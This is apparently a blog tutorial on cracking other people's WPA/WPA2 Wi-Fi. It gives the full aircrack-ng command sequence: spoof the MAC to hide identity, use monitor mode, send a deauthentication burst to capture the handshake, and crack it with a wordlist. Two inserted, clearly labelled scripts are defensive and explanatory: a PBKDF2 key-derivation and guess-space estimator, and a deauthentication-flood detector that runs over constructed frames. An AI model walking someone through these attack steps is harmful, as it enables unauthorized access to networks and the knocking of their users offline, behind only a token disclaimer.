I regularly get asked how hackers break into people's Wi-Fi and whether it is easy. This post will explain exactly how to hack Wi-Fi and just how easy it is.
WPA and WPA2 are a lot more secure than WEP; however, with persistence and a powerful computer anything is possible.
*** This tutorial is for educational purposes only and not to be used for illegal purposes!
There are a few different ways to crack Wi-Fi passwords. This method works best for me but might not for everyone, so if you have any tips or improvements, please feel free to comment below.
What you will need:
- Windows, or preferably BackTrack or another Linux distribution
- Aircrack-ng
- A target Wi-Fi network (preferably your own). I find networks with custom names easier to crack because they tend to have custom passwords.
- A password list
- A few hours to spare
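Why a password list and a few hours are on that list: WPA/WPA2-PSK turns the passphrase into the 256-bit Pairwise Master Key with PBKDF2-HMAC-SHA1, using the SSID as the salt and 4096 iterations, so every wordlist entry costs the same derivation before it can be checked against a handshake, and a table of keys built for one SSID is useless against another. The script below is an added example, not code from the original post; the SSID and passphrase values in it are constructed, and the only real reference value is the IEEE 802.11i test vector ("password"/"IEEE").

```python
import hashlib
import math

# Constructed example values (not from the original post).
SAMPLE_SSID = "HomeNetwork"
SAMPLE_PASSPHRASE = "correct horse battery staple"


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """Derive the WPA/WPA2-PSK Pairwise Master Key as specified in IEEE 802.11i:
    PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 256 bits).
    Every wordlist candidate must go through this derivation before it can be
    compared against a captured four-way handshake, which bounds the guess rate."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrases are 8 to 63 ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), 4096, dklen=32)


def ssid_changes_pmk(passphrase: str, ssid_a: str, ssid_b: str) -> bool:
    """The SSID is the salt, so the same passphrase yields a different PMK on a
    differently named network: precomputed tables only work per SSID, which is
    one reason a unique network name is worth having."""
    return wpa2_pmk(passphrase, ssid_a) != wpa2_pmk(passphrase, ssid_b)


def candidate_space(length: int, alphabet_size: int) -> int:
    """Number of distinct passphrases of the given length over an alphabet."""
    return alphabet_size ** length


def entropy_bits(candidates: int) -> float:
    """Guess-space size expressed in bits."""
    return math.log2(candidates)


def seconds_to_exhaust(candidates: int, derivations_per_second: float) -> float:
    """Worst-case time to derive a PMK for every candidate at a given rate.
    The rate is whatever the attacker's hardware achieves for 4096-round
    PBKDF2-HMAC-SHA1; the defender controls only the size of the candidate space."""
    return candidates / derivations_per_second


if __name__ == "__main__":
    print("PMK for constructed sample:", wpa2_pmk(SAMPLE_PASSPHRASE, SAMPLE_SSID).hex())
    # Compare an 8-digit PIN-style passphrase with a 16-character mixed one at the
    # same (hypothetical) rate of 100,000 derivations per second.
    for length, alphabet in ((8, 10), (16, 62)):
        space = candidate_space(length, alphabet)
        print(f"length {length:2d}, alphabet {alphabet:2d}: {entropy_bits(space):5.1f} bits, "
              f"{seconds_to_exhaust(space, 1e5) / 86400:.3g} days worst case at 1e5/s")
```

The takeaway is on the defender's side: a passphrase that is not in any wordlist and is long enough that its candidate space is infeasible at any plausible derivation rate cannot be recovered from a captured handshake, regardless of how many hours are spent on it.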
I will be doing this from Ubuntu as I personally find it easier to crack/hack on Linux.
The first thing to do is change your MAC address. This is otherwise known as MAC spoofing and is used to protect your identity and ensure your security (of course this isn't a problem if you're only using this for educational purposes).
Open a new terminal (ctrl + alt + t) then type:
- Disable the interface: sudo ifconfig <interface> down
- Change the MAC address: sudo ifconfig <interface> hw ether 00:11:22:33:44:55
- Enable the interface: sudo ifconfig <interface> up
That’s it, easy as 1,2,3.
Note: Replace <interface> with the appropriate name of your interface e.g. wlan0 or eth0.
Now let's begin the fun part!
To start cracking the Wi-Fi password, ensure you have Aircrack-ng installed; if you don't, simply open a new terminal and type: sudo apt-get install aircrack-ng. You will also need a wordlist; a basic one can be found here, the list is called darkc0de.lst. Make sure the file is saved in your root/home directory.
Once installed, close the terminal, open a new one and begin cracking.
- First, put the adapter in monitor mode: airmon-ng start wlan0
- Second, start sniffing for networks: airodump-ng mon0. Pick a BSSID that has WPA or WPA2 and PSK.
- Once you have chosen your BSSID, you need your interface to monitor on the same channel as that BSSID. Stop the monitor interface with airmon-ng stop mon0, then start monitoring on the BSSID's channel with: airmon-ng start wlan0 <channel>
- Now focus on your selected BSSID: airodump-ng --bssid <the selected bssid> -c <the channel of the bssid> -w wpalist <your interface>
- Now we need to capture a WPA handshake. To do this we send deauthentication frames to the BSSID: open a new terminal and type aireplay-ng --deauth 100 -a <bssid> mon0.
Now we have everything we need, so go back to cracking the password.
- Go back to your original terminal and type: aircrack-ng -w <location of your wordlist> -b <bssid> wpalist-01.cap
Note: If you have no luck with wpadeauth*.cap, then try wpalist.cap.
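The deauthentication step above is also the noisiest part of the whole procedure, and it is what a wireless IDS keys on: a healthy network sees a handful of deauthentication frames a minute as clients roam or leave, while a burst of a hundred in a few seconds, usually to the broadcast address, is the signature of a handshake-capture attempt. The script below is an added example, not code from the original post: it decodes the fixed 802.11 management-frame header, flags deauthentication frames (type 0, subtype 12) and raises one alert per BSSID when the count in a sliding window crosses a threshold. The capture it runs over is constructed inline (made-up MAC addresses, no real traffic), and the window and threshold are assumed values a deployment would tune.

```python
import struct
from collections import defaultdict, deque

# IEEE 802.11 frame control, first byte: bits 0-1 protocol version,
# bits 2-3 type, bits 4-7 subtype. Deauthentication = management (0), subtype 12.
MGMT_TYPE = 0
DEAUTH_SUBTYPE = 12
HEADER_LEN = 24  # FC(2) + duration(2) + addr1/2/3(18) + sequence control(2)


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def parse_frame(frame: bytes):
    """Decode the fixed header of an 802.11 frame. Returns None if the frame is
    shorter than a management header; otherwise a dict with type/subtype, the
    three addresses and, for deauthentication frames, the reason code."""
    if len(frame) < HEADER_LEN:
        return None
    fc0 = frame[0]
    ftype = (fc0 >> 2) & 0x3
    subtype = (fc0 >> 4) & 0xF
    info = {
        "type": ftype,
        "subtype": subtype,
        "is_deauth": ftype == MGMT_TYPE and subtype == DEAUTH_SUBTYPE,
        "dst": mac_str(frame[4:10]),
        "src": mac_str(frame[10:16]),
        "bssid": mac_str(frame[16:22]),
        "reason": None,
    }
    if info["is_deauth"] and len(frame) >= HEADER_LEN + 2:
        # The deauthentication body is a single little-endian 16-bit reason code.
        info["reason"] = struct.unpack_from("<H", frame, HEADER_LEN)[0]
    return info


def detect_deauth_floods(capture, window_s=10.0, threshold=20):
    """capture: iterable of (timestamp_seconds, raw_frame_bytes), in time order.
    Keeps a sliding window of deauthentication timestamps per BSSID and returns
    one alert (bssid, window_start_ts, count) the first time a BSSID's count
    within the window reaches the threshold."""
    recent = defaultdict(deque)
    alerted = set()
    alerts = []
    for ts, raw in capture:
        info = parse_frame(raw)
        if info is None or not info["is_deauth"]:
            continue
        q = recent[info["bssid"]]
        q.append(ts)
        while q and ts - q[0] > window_s:
            q.popleft()
        if len(q) >= threshold and info["bssid"] not in alerted:
            alerted.add(info["bssid"])
            alerts.append((info["bssid"], q[0], len(q)))
    return alerts


# --- Constructed test vectors: made-up addresses, no real capture ---
SAMPLE_BSSID = bytes.fromhex("001122334455")
SAMPLE_CLIENT = bytes.fromhex("66778899aabb")
BROADCAST = b"\xff" * 6


def make_sample_deauth(bssid: bytes, dest: bytes, reason: int = 7) -> bytes:
    """Bytes of a deauthentication frame as an AP would emit it
    (addr1 = destination, addr2 = addr3 = BSSID), for feeding the parser."""
    return (bytes([0xC0, 0x00]) + b"\x00\x00" + dest + bssid + bssid
            + b"\x00\x00" + struct.pack("<H", reason))


def make_sample_beacon(bssid: bytes) -> bytes:
    """Header-only beacon (subtype 8) to show non-deauth frames are ignored."""
    return bytes([0x80, 0x00]) + b"\x00\x00" + BROADCAST + bssid + bssid + b"\x00\x00"


SAMPLE_CAPTURE = (
    [(0.0, make_sample_beacon(SAMPLE_BSSID))]
    # four legitimate deauths spread over a minute (client leaving, reason 3)
    + [(15.0 * i, make_sample_deauth(SAMPLE_BSSID, SAMPLE_CLIENT, reason=3)) for i in range(4)]
    # then a burst of 100 broadcast deauths in five seconds (reason 7)
    + [(100.0 + 0.05 * i, make_sample_deauth(SAMPLE_BSSID, BROADCAST, reason=7)) for i in range(100)]
)

if __name__ == "__main__":
    for bssid, start, count in detect_deauth_floods(SAMPLE_CAPTURE):
        print(f"deauth flood against {bssid}: {count} frames within 10s starting at t={start}")
```

On a real monitor-mode capture the frames would come from a pcap reader with the radiotap header stripped; the parser only needs the 802.11 header itself. Note that a detector like this tells you a handshake capture was attempted, not whether the passphrase will fall to a wordlist, which is decided entirely by how the passphrase was chosen.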